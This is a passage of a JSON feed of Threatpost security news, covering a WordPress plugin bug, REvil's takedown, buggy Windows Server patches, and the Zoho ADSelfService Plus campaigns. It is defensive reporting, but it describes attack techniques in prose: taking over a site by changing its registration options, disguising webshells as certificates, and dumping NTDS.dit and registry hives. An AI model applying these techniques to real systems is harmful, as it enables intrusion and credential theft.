AJAX action and execute the function, Chamberland wrote. However, action from the site\u2019s administrator \u2013 \u201clike clicking on a link or browsing to a certain website while the administrator was authenticated to the target site\u201d \u2013 is needed to fully exploit the flaw, she said.\n\nIn these cases, \u201cthe request would be successfully sent and trigger the action which would allow the attacker to update arbitrary options on that website,\u201d she explained in the post.\n\nExploiting Arbitrary Options Update vulnerabilities in this way is something threat actors \u201cfrequently abuse,\u201d allowing them to update any option on a WordPress website and to ultimately take it over, Chambers noted.\n\nThis latter privilege occurs if an attacker sets \u201cthe user_can_register option to true and the default_role option to administrator so that they can register on the vulnerable site as an administrator,\u201d she explained.\n\n## **Risks and Mitigations**\n\nThough the fact that the flaws found in the plug-ins require administrator action makes them \u201cless likely to be exploited,\u201d they can have \u201csignificant impact\u201d if they are exploited, Chamberland said.\n\n\u201cAs such, it serves as an incredibly important reminder to remain aware when clicking on links or attachments and to ensure that you are regularly keeping your plug-ins and themes up to date,\u201d she advised.\n\nRecommended actions for WordPress users who use the plug-ins are to verify that their site has been updated to the latest patched version available for each of them. That would be version 2.3 for \u201cLogin/Signup Popup\u201d, version 2.5.2 for \u201cWaitlist Woocommerce (Back in stock notifier )\u201d, and version 2.1 for \u201cSide Cart Woocommerce (Ajax),\u201d according to the post.\n\nAll Wordfence users are protected against the vulnerability, according to the post. Wordfence Premium users received a firewall rule to protect against any exploits targeting them on Nov. 5, and sites still using the free version of Wordfence received the same protection on Dec. 5.\n\n**Password** **Reset: ****[On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):** Fortify 2022 with a password security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the _new_ password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. **[Register & Stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)** \u2013 sponsored by Specops Software.\n", "cvss3": {}, "published": "2022-01-14T14:07:36", "type": "threatpost", "title": "Three Plugins with Same Bug Put 84K WordPress Sites at Risk", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-44757"], "modified": "2022-01-14T14:07:36", "id": "THREATPOST:31B21CE688CDF18D92BF7799CEAFD33F", "href": "https://threatpost.com/plugins-vulnerability-84k-wordpress-sites/177654/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-01-18T16:19:04", "description": "At the request of U.S. authorities. Russia\u2019s Federal Security Service (FSB) has swooped in to \u201cliquidate\u201d the REvil ransomware gang, it said on Friday.\n\nAccording to [local reports](<https://www.rbc.ru/politics/14/01/2022/61e171599a79479dde32112e?from=from_main_1>), the country\u2019s main security agency raided 25 locations in Leningrad, Lipetsk, Moscow and St. Petersburg, seizing assets worth more than $5.6 million (426 million rubles) in various forms, including $600,000; \u20ac500,000; various cryptocurrency amounts; and 20 luxury vehicles.\n\nThe FSB said that a total of 14 alleged cybercriminals were also caught up in the raid and have been charged with \u201cillegal circulation of means of payment.\u201d The security service also said that it \u201cneutralized\u201d the gang\u2019s infrastructure.\n\nThe impetus for the attack was reportedly a formal request for action from U.S. authorities, \u201creporting about the leader of the criminal community and his involvement in encroachments on the information resources of foreign high-tech companies by introducing malicious software, encrypting information and extorting money for its decryption,\u201d according to an FSB media statement.\n\nIt added, \u201cAs a result of the joint actions of the FSB and the Ministry of Internal Affairs of Russia, the organized criminal community ceased to exist, the information infrastructure used for criminal purposes was neutralized. Representatives of the competent U.S. authorities have been informed about the results of the operation.\u201d\n\nThe move comes two weeks after a [high-stakes phone call](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/12/30/statement-by-press-secretary-jen-psaki-on-president-bidens-phone-call-with-president-vladimir-putin-of-russia/>) between Russian President Vladimir Putin and U.S. President Joe Biden, who has been calling for action against Russia-dwelling ransomware gangs for months.\n\nREvil (aka Sodinokibi) once rose to dominance as a major fixture in the ransomware extortion racket \u2013 locking up big-fish target networks ([like JBS Foods](<https://threatpost.com/revil-ransomware-ground-down-jbs-sources/166597/>)) and extracting millions in ransom payments. It made headlines last year with the [sprawling zero-day supply-chain attacks](<https://threatpost.com/kaseya-patches-zero-days-revil-attacks/167670/>) on Kaseya\u2019s customers; and [was linked to](<https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/>) the infamous Colonial Pipeline cyberattack. All of that sparked an official shout-out from Biden in the summer, with a demand that Putin shut down ransomware groups nesting in his country.\n\nShortly after that, in July, REvil\u2019s servers [mysteriously went dark](<https://threatpost.com/ransomware-revil-sites-disappears/167745/>) and stayed that way for two months. But by late summer, the group [was reborn](<https://threatpost.com/revil-back-coder-decryptor-key/169403/>) as a ransomware-as-a-service (RaaS) player, though by all accounts it was operating at a fraction of its former power and missing key personnel. Its main coder, UNKN (aka Unknown), for instance, reportedly left the group. It also got into trouble in the cyber-underground for cutting its RaaS affiliates [out of their fair share](<https://threatpost.com/how-revil-may-have-ripped-off-its-own-affiliates/174887/>) of ransom payments.\n\nChris Morgan, senior cyber-threat intelligence analyst at Digital Shadows, noted that FSB\u2019s actions sparked some chatter on the cyber-underground about REvil falling prey to political machinations.\n\n\u201cIt\u2019s likely that the arrests against REvil members were politically motivated, with Russia looking to use the event as leverage; it could be debated that this may relate to sanctions against Russia recently proposed in the US, or the developing situation on Ukraine\u2019s border,\u201d he said. \u201cChatter on Russian cybercriminal forums identified this sentiment.\u201d\n\nHe said that one user suggested that REvil members are \u201cpawns in a big political game,\u201d while another user suggested that Russia made the arrests \u201con purpose\u201d so that the United States would \u201ccalm down.\u201d\n\n## **REvil Takedown: Will it Matter?**\n\nThe reported takedown may have defanged a brand-name ransomware operator, but REvil is far from what it used to be, and other groups continue to strike with impunity. LockBit 2.0, [for instance](<https://threatpost.com/lockbit-ransomware-proliferates-globally/168746/>), has been flourishing, as evidenced by Herjavec Group\u2019s LockBit 2.0 profile and its long list of LockBit 2.0\u2019s victims.\n\nRansomware opportunities are growing in availability, too; Group-IB [recently found](<https://threatpost.com/double-extortion-ransomware-data-leaks/176723/>) that 21 new RaaS affiliate programs sprang up over the past year, and the number of new double-extortion leak sites more than doubled to 28, the report said.\n\nIn other words, this action may be simply a tiny win in the much larger battle against ransomware. But REvil has become an important symbolic target in the fight \u2013 not least for its potential ties to Colonial Pipeline \u2013 and has been increasingly in government crosshairs worldwide.\n\nIn October, a [multi-country undercover effort](<https://threatpost.com/revil-servers-offline-governments/175675/>) led to REvil\u2019s servers being temporarily taken offline. In November, Europol [announced the arrest](<https://threatpost.com/revil-affiliates-arrested-doj-europol/176087/>) of a total of seven suspected REvil/GandCrab ransomware affiliates \u2013 including a Ukrainian national charged by the United States with ransomware assaults that include the Kaseya attacks. Other countries have also snagged affiliates (random cyberattackers who rent REvil\u2019s infrastructure), which doesn\u2019t affect the main gang; but in October, Germany identified an alleged core REvil operator, hiding in Russia and far from the reach of extradition.\n\nRussia, for its part, may gain some kudos for this week\u2019s action, though researchers have long noted that the country has become a safe haven for ransomware masterminds, who avoid attacking Russian targets in exchange.\n\n\u201cIn Russia, they literally have no fear of being arrested,\u201d Jon DiMaggio, threat group researcher and chief security strategist at Analyst1, recently said, discussing the cyber-underground\u2019s collective shrug at the November news that REvil affiliates were being busted. \u201cThey make comments like, \u2018protect the motherland, the motherland protects you\u2019\u2026They put Russian flag icons on their messages.\u201d\n\nCould that be changing? Only time will tell, researchers said.\n\n\u201cRussia acting on any cybercrime report, especially ransomware, is especially rare,\u201d John Bambenek, principal threat hunter at Netenrich, told Threatpost. \u201cUnless it involves child exploitation or Chechens, cooperation with the FSB just doesn\u2019t happen. It is doubtful that this represents a major change in Russia\u2019s stance to criminal activity within their borders (unless they target Russian citizens) and more that their diplomatic position is untenable and they needed to sacrifice a few expendables to stall more serious geopolitical pressure.\u201d\n\nHe added, \u201cIf this time in three months there isn\u2019t another major arrest, it\u2019s safe to assume no real change has happened with Russia\u2019s approach.\u201d\n\n\u201cIt\u2019s possible that the FSB raided REvil knowing that the group were high on the priority list for the U.S., while considering that their removal would have a small impact on the current ransomware landscape,\u201d Digital Shadows\u2019 Morgan added.\n\n**_Password_**_ _**_Reset: _****_[On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):_**_ Fortify 2022 with a password-security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. _**_[Register & stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)_**_ \u2013 sponsored by Specops Software._\n", "cvss3": {}, "published": "2022-01-14T14:45:35", "type": "threatpost", "title": "Russian Security Takes Down REvil Ransomware Gang", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-44757"], "modified": "2022-01-14T14:45:35", "id": "THREATPOST:0461DD3D883C3FB99943B312BF96E57D", "href": "https://threatpost.com/russian-security-revil-ransomware/177660/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-01-18T16:18:10", "description": "Microsoft has yanked the Windows Server updates it issued on Patch Tuesday after admins found that the updates had critical bugs that break three things: They trigger spontaneous boot loops on Windows servers that act as domain controllers, break Hyper-V and render ReFS volume systems unavailable.\n\nThe shattering of Windows was first reported by [BornCity](<https://borncity.com/win/2022/01/12/windows-server-januar-2022-sicherheitsupdates-verursachen-boot-schleife/>) on Tuesday, as in, on the same day that Microsoft released a mega-dump of 97 security updates in its [January 2022 Patch Tuesday](<https://threatpost.com/microsoft-wormable-critical-rce-bug-zero-day/177564/>) update.\n\nThis month\u2019s batch included the Windows Server 2012 R2 KB5009624 update, the Windows Server 2019 KB5009557 update and the Windows Server 2022 KB5009555 update, all of which are apparently buggy.\n\n\u201cAdministrators of Windows Domain Controllers should be careful about installing the January 2022 security updates,\u201d reported [BornCity](<https://borncity.com/win/2022/01/12/windows-server-januar-2022-sicherheitsupdates-verursachen-boot-schleife/>), which is a blog about information technology run by German freelance writer and physics engineer G\u00fcnter Born.\n\n\u201cI have now received numerous reports that Windows servers acting as domain controllers will not boot afterwards,\u201d Born wrote. \u201cLsass.exe (or wininit.exe) triggers a blue screen with the stop error 0xc0000005. It can hit all Windows Server versions that act as domain controllers, according to my estimation.\u201d\n\nDomain controllers are servers that handle security authentication requests within a Windows domain. Microsoft\u2019s Hyper-V, the other chunk of Windows being broken by the Windows Server updates, is a native hypervisor that can create virtual machines on x86-64 systems running Windows.\n\nThe third thing that\u2019s shattering due to the updates, Resilient File System (ReFS), is a file system that\u2019s designed to maximize data availability, scale efficiently to large data sets across diverse workloads and provide data integrity with resiliency to corruption, as Microsoft [describes](<https://docs.microsoft.com/en-us/windows-server/storage/refs/refs-overview>) it.\n\nBorn cited numerous reports from users who\u2019ve concluded that the issue affects all supported Windows Server versions.\n\nMultiple Reddit users confirmed the problems. [One commenter](<https://www.reddit.com/r/sysadmin/comments/s21ae1/january_updates_causing_unexpected_reboots_on/>) said that it \u201cLooks like KB5009557 (2019) and KB5009555 (2022) are causing something to fail on domain controllers, which then keep rebooting every few minutes.\u201d\n\nAnother Reddit contributor [said](<https://www.reddit.com/r/sysadmin/comments/s1oqv8/kb5009543_january_11_2022_breaks_l2tp_vpn/>) on Tuesday that they had just rebooted Win10 laptops that had the installed KB5009543 & KB5008876 updates and found that they\u2019re also breaking L2TP VPN connections.\n\n\u201cNow their L2TP VPNs to different sites (All SonicWalls) are not working,\u201d the Redditor said, citing an error message that read: \u201cThe L2TP connection attempt failed because the security layer encountered a processing error during initial negotiations with the remote computer.\u201d\n\nOn Thursday, following the server update brouhaha, BleepingComputer [reported](<https://www.bleepingcomputer.com/news/microsoft/microsoft-pulls-new-windows-server-updates-due-to-critical-bugs/>) that Microsoft has pulled the January Windows Server cumulative updates, which are reportedly no longer accessible via Windows Update. As of Thursday afternoon, however, the company reportedly hadn\u2019t pulled the Windows 10 and Windows 11 cumulative updates that were breaking L2TP VPN connections.\n\n011422 08:48 UPDATE: Microsoft confirmed that it\u2019s aware of the reports and is investigating. A spokesperson pointed users to the company\u2019s customer guidance page for any known issues: [Windows release health | Microsoft Docs](<https://nam02.safelinks.protection.outlook.com/?url=https%3A%2F%2Fdocs.microsoft.com%2Fen-us%2Fwindows%2Frelease-health%2F&data=04%7C01%7Cmmaclachlan%40we-worldwide.com%7Ca95e18bba6204baad99208d9d6f38898%7C3ed60ab455674971a5341a5f0f7cc7f5%7C0%7C0%7C637777163738633134%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=cwm6AQvP2A1g8dItDwBH4zoS9ETJWW7WoXE6SA4R6pE%3D&reserved=0>).\n\n## When Patches Bite Back\n\nHow do you convince organizations to patch promptly when patches sometimes don\u2019t work \u2013 or, worse, when they cause outages on critical infrastructure such as directory controllers?\n\nIt\u2019s clearly a problem from a security perspective, experts say. \u201cThe [log4j](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) difficulties of the past few weeks demonstrate that \u2026 we need organizations to apply security patches when they are available,\u201d said John Bambenek, principal threat hunter at Netenrich.\n\nWhen patches don\u2019t work, or worse, when they break things, it \u201cprovides the counter incentive to patching where organizations take a risk-averse approach to applying updates,\u201d he told Threatpost on Thursday. \u201cDowntime is easily measurable\u2026the incremental risk of a security breach is not, which means cautious (instead of proactive) actions to patching will tend to win out.\u201d\n\nIt\u2019s a painful tradeoff to make between keeping your operations going by using systems with known vulnerabilities versus keeping those systems fully secure but with added administrative effort, noted Bud Broomhead, CEO at Viakoo. \u201cOrganizations make these tradeoffs every day with IoT devices that fail to get patched quickly (or ever); however, it\u2019s uncommon to see this with Windows Server, because there are such effective mechanisms through Windows Update to deliver and install patches quickly.\u201d\n\nBroomhead suggested that despite the testing Microsoft goes through in releasing an update, one best practice is to always install a new patch on a single machine before deploying more broadly. \u201cThis can help Windows Server administrators to assess their specific issues, and their tolerance for running under those conditions until a more stable patch is available,\u201d he told Threatpost.\n\nThat\u2019s actually closer to the reality, noted Roy Horev, co-founder and CTO at Vulcan Cyber. \u201cFirst, very rarely are patches ever directly applied straight from Microsoft, or any vendor, on Tuesday, or any other day, without first going through a series of tests to make sure they aren\u2019t breaking things,\u201d he pointed out.\n\nEven so, it\u2019s tough to implement vendor patches and updates without breaking things, he told Threatpost via email \u2013 even if those patches are delivered straight from Redmond. \u201cThe eternal compromise between secure and/or stable production environments doesn\u2019t rest just because the updates are coming from Microsoft,\u201d Horev commented.\n\n**Password** **Reset: ****[On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):** Fortify 2022 with a password security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the _new_ password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. **[Register & Stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)** \u2013 sponsored by Specops Software.\n", "cvss3": {}, "published": "2022-01-13T23:08:53", "type": "threatpost", "title": "Microsoft Yanks Buggy Windows Server Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-44757"], "modified": "2022-01-13T23:08:53", "id": "THREATPOST:2819C02936EF8F6F36ACF4F04F4B71DB", "href": "https://threatpost.com/microsoft-yanks-buggy-windows-server-updates/177648/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-16T21:32:23", "description": "The FBI, CISA and the U.S. Coast Guard Cyber Command (CGCYBER) warned today that state-backed advanced persistent threat (APT) actors are likely among those who\u2019ve been actively exploiting a newly identified bug in a Zoho single sign-on and password management tool since early last month.\n\nAt issue is a critical authentication bypass vulnerability in Zoho ManageEngine ADSelfService Plus platform that can lead to remote code execution (RCE) and thus open the corporate doors to attackers who can run amok, with free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nThe Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) platform for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. It is, in other words, a powerful, highly privileged application which can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nLast Tuesday, [Zoho issued a patch](<http://cve-2021-40539>) \u2013 [Zoho ManageEngine ADSelfService Plus build 6114](<https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release>) \u2013 for the flaw, which is tracked as [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) with a 9.8 severity rating. As the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) at the time, it was being actively exploited in the wild as a zero-day.\n\nAccording to today\u2019s [joint advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) from the three government cybersecurity arms \u2013 FBI, CISA and CGCYBER \u2013 the exploits pose \u201ca serious risk to critical infrastructure companies, U.S.-cleared defense contractors, academic institutions, and other entities that use the software.\u201d\n\nYou can see why: Successful exploitation of a lynchpin piece of security like a SSO and password handler could lay out a welcome mat for adversaries. Specifically, as the advisory iterated, an adversary could use the vulnerability to pry open security defenses in order to compromise admin credentials, move laterally through the network, and exfiltrate registry hives and AD files.\n\nThat\u2019s of concern to any business, but with Zoho, we\u2019re talking about a security solution that\u2019s used by critical infrastructure companies, U.S.-cleared defense contractors and academic institutions, among others.\n\nThe joint advisory said that APT groups have in fact targeted such entities in multiple industries, including transportation, IT, manufacturing, communications, logistics and finance.\n\n\u201cIllicitly obtained access and information may disrupt company operations and subvert U.S. research in multiple sectors,\u201d the advisory noted. \u201cSuccessful exploitation of the vulnerability allows an attacker to place webshells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.\u201d\n\n## Confirming Exploits May Be Tough\n\nSuccessful attacks have been uploading a .zip file containing a JavaServer Pages (JSP) webshell \u2013 accessible at /help/admin-guide/Reports/ReportGenerate.jsp \u2013 pretending to be an x509 certificate, service.cer. Next come requests to different API endpoints to further exploit the targeted system.\n\nThe next step in the exploit is lateral movement using Windows Management Instrumentation (WMI), gaining access to a domain controller, dumping of NTDS.dit and SECURITY/SYSTEM registry hives, and then, from there, further compromised access.\n\n\u201cConfirming a successful compromise of ManageEngine ADSelfService Plus may be difficult,\u201d the security agencies advised, given that the attackers are running clean-up scripts designed to rub out their tracks by removing traces of the initial point of compromise and by obscuring any relationship between the exploitation of CVE-2021-40539 and the webshell.\n\nThe advisory provided this laundry list of tactics, techniques and processes (TTP) being used by threat actors to exploit the vulnerability:\n\n * WMI for lateral movement and remote code execution (wmic.exe)\n * Using plaintext credentials acquired from compromised ADSelfService Plus host\n * Using pg_dump.exe to dump ManageEngine databases\n * Dumping NTDS.dit and SECURITY/SYSTEM/NTUSER registry hives\n * Exfiltration through webshells\n * Post-exploitation activity conducted with compromised U.S. infrastructure\n * Deleting specific, filtered log lines\n\n## Mitigations\n\nOrganizations that detect indicators of compromise (IoC) around their ManageEngine ADSelfService Plus installations \u201cshould take action immediately,\u201d the trio of agencies instructed.\n\n\u201cFBI, CISA, and CGCYBER strongly urge users and administrators to update to ADSelfService Plus build 6114,\u201d the trio stated. They also strongly urged organizations to keep ADSelfService Plus away from direct access via the internet.\n\nThey\u2019re also strongly recommending domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets \u201cif any indication is found that the NTDS.dit file was compromised.\u201d\n\n## This One Will Hurt\n\nJake Williams, co-founder and CTO at incident response firm BreachQuest, said that organizations should take note of the fact that threat actors have been using webshells as a post-exploitation payload. In the case of the exploitation of this Zoho flaw, they\u2019re using webshells disguised as certificates: something that security teams should be able to pick up on in web server logs, but \u201conly if organizations have a plan for detection.\u201d\n\nNo time like the present to start, he told Threatpost on Thursday: \u201cGiven that this will certainly not be the last vulnerability that results in web shell deployment, organizations are advised to baseline normal behavior in their web server logs so they can quickly discover when a web shell has been deployed.\u201d\n\nFinding a critical vulnerability in the system intended to help your employees manage and reset their passwords is \u201cexactly as bad as it sounds,\u201d noted Oliver Tavakoli, CTO at cybersecurity firm Vectra. \u201cEven if the ADSelfService Plus server was not accessible from the internet, it would be accessible from any compromised laptop. Recovery will be expensive \u2013 \u2018domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets\u2019 are certainly disruptive by themselves, and the APT groups may have established other means of persistence in the intervening time.\u201d\n\nThis ManageEngine vulnerability is the fifth instance of similarly critical vulnerabilities from ManageEngine this year, noted Sean Nikkel, senior cyber threat intel analyst at digital risk protection provider Digital Shadows. Unfortunately but predictably, given how much access attackers can get out of exploiting a vulnerability like this, we can likely expert more widespread exploitation of this and previous bugs, \u201cgiven the interactivity with Microsoft system processes.\u201d\n\nNikkel continued with yet another gloomy prediction: \u201cThe observation that APT groups are actively exploiting CVE-2021-40539 should highlight the potential exposure it might cause. If trends are consistent, extortion groups will likely seek exploitation for ransomware activity in the not-so-distant future,\u201d he mused.\n\nAll of which points to what CISA et al. have been urging about these vulnerabilities: namely, patch fast. \u201cUsers of Zoho\u2019s software should apply patches immediately to avoid the types of compromise described in the CISA bulletin,\u201d Nikkel said.\n\n## See Something, Say Something\n\nOrganizations should immediately report any of the following to [CISA](<https://us-cert.cisa.gov/report>) or the FBI:\n\n * Identification of IoC as outlined in the advisory.\n * Presence of webshell code on compromised ManageEngine ADSelfService Plus servers.\n * Unauthorized access to or use of accounts.\n * Evidence of lateral movement by malicious actors with access to compromised systems.\n * Other indicators of unauthorized access or compromise.\n\nHere are the reporting instructions:\n\n * Contact your local FBI field office at <https://www.fbi.gov/contact-us/field-offices>, or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, include the incident date, time and location; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n * To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.gov.\n * To report cyber incidents to the Coast Guard contact the USCG National Response Center (NRC). Phone: 1-800-424-8802, email: NRC@uscg.mil.\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-16T21:09:23", "type": "threatpost", "title": "CISA, FBI: State-Backed APTs Are Exploiting Critical Zoho Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-16T21:09:23", "id": "THREATPOST:1606F3DA3AAD368249E36D32FC2B8079", "href": "https://threatpost.com/cisa-fbi-state-backed-apts-exploit-critical-zoho-bug/174768/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-09T14:12:34", "description": "A new campaign is prying apart a known security vulnerability in the Zoho ManageEngine ADSelfService Plus password manager, researchers warned over the weekend. The threat actors have managed to exploit the Zoho weakness in at least nine global entities across critical sectors so far (technology, defense, healthcare, energy and education), deploying the Godzilla webshell and exfiltrating data.\n\nOn Sunday, Palo Alto Network\u2019s Unit 42 researchers [said](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>) that the targeted cyberespionage campaign is distinct from the ones that the FBI and [CISA warned about](<https://threatpost.com/cisa-fbi-state-backed-apts-exploit-critical-zoho-bug/174768/>) in September.\n\nThe bug is a critical authentication bypass flaw \u2013 CVE-2021-40539 \u2013 that allows unauthenticated remote code execution (RCE). Zoho [patched](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) the vulnerability in September, but it\u2019s been actively exploited in the wild starting at least as early as August when it was a zero-day, opening the corporate doors to attackers who can run amok as they get free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nConsequences of a successful exploit can be significant: The Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) platform for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. It is, in other words, a powerful, highly privileged application that can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\nCISA\u2019s alert explained that in the earlier attacks, state-backed, advanced persistent threats (APTs) were deploying a specific webshell and other techniques to maintain persistence in victim environments.\n\nNine days after the CISA alert, Unit 42 researchers saw yet another, unrelated campaign kick off starting on Sept. 17, as a different actor started scanning for unpatched servers. On Sept. 22, after five days of harvesting data on potential targets, exploitation attempts started up and likely continued into early October.\n\nUnit 42 researchers believe that the actor more or less indiscriminately targeted unpatched servers across the spectrum, from education to the Department of Defense, with scans of at least 370 Zoho ManageEngine servers in the U.S. alone.\n\n\u201cWhile we lack insight into the totality of organizations that were exploited during this campaign, we believe that, globally, at least nine entities across the technology, defense, healthcare, energy and education industries were compromised.\u201d they said.\n\n## Godzilla Webshell Does Some Heavy Lifting\n\nUnit 42 said that after threat actors exploited [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) to gain RCE, they quickly moved laterally to deploy several pieces of malware, relying particularly on the publicly available Godzilla webshell.\n\nThe actor uploaded several Godzilla variations to compromised servers and planted some new malware tools as well, including a custom Golang-based open-source backdoor called [NGLite](<https://github.com/Maka8ka/NGLite>) and a new credential-stealer that Unit 42 is tracking as KdcSponge.\n\n\u201cThe threat actors then used either the webshell or the NGLite payload to run commands and move laterally to other systems on the network, while they exfiltrated files of interest simply by downloading them from the web server,\u201d according to the analysis. After the actors pivoted to a domain controller, they installed the new KdcSponge stealer, which is designed to harvest usernames and passwords from domain controllers as accounts attempt to authenticate to the domain via Kerberos.\n\nBoth Godzilla and NGLite are written in Chinese and are free for the taking on GitHub.\n\n\u201cWe believe threat actors deployed these tools in combination as a form of redundancy to maintain access to high-interest networks,\u201d Unit 42 surmised. The researchers described Godzilla as something of a multi-function pocket knife of a webshell, noting that it \u201cparses inbound HTTP POST requests, decrypts the data with a secret key, executes decrypted content to carry out additional functionality and returns the result via a HTTP response.\u201d\n\nAs such, attackers can refrain from inflicting targeted systems with code that\u2019s likely to be flagged as malicious until they\u2019re ready to dynamically execute it, researchers said.\n\n## Using NKN to Communicate Is an Eye-Opener\n\n\u201cNGLite is characterized by its author as an \u2018anonymous cross-platform remote control program based on blockchain technology,'\u201d United 42 researchers Robert Falcone, Jeff White and Peter Renals explained. \u201cIt leverages New Kind of Network ([NKN](<https://nkn.org/>)) infrastructure for its command and control (C2) communications, which theoretically results in anonymity for its users.\u201d\n\nThe researchers noted that using NKN \u2013 a legitimate networking service that uses blockchain technology to support a decentralized network of peers \u2013 for a C2 channel is \u201cvery uncommon.\u201d\n\n\u201cWe have seen only 13 samples communicating with NKN altogether \u2013 nine NGLite samples and four related to a legitimate open-source utility called [Surge](<https://github.com/rule110-io/surge>) that uses NKN for file sharing.\u201d\n\n## Threat Actor Shares TTPs with Emissary Panda\n\nUnit 42 said the identity of the threat actor is unclear, but researchers saw [correlations in tactics and tooling](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>) between the attacker and that of Threat Group 3390, aka [Emissary Panda](<https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/>), APT27, Bronze Union and LuckyMouse), an APT that\u2019s been around since 2013 and which [is believed to operate from China](<https://threatpost.com/bronze-union-apt-updates-remote-access-trojans-in-fresh-wave-of-attacks/142219/>).\n\n\u201cSpecifically, as documented by SecureWorks in an article on a [previous TG-3390 operation](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>), we can see that TG-3390 similarly used web exploitation and another popular Chinese webshell called [ChinaChopper](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) for their initial footholds before leveraging legitimate stolen credentials for lateral movement and attacks on a domain controller,\u201d Unit 42 said. \u201cWhile the webshells and exploits differ, once the actors achieved access into the environment, we noted an overlap in some of their exfiltration tooling.\u201d\n\n110921 08:51 UPDATE: [Microsoft said](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) on Monday that it\u2019s attributing this campaign with high confidence to 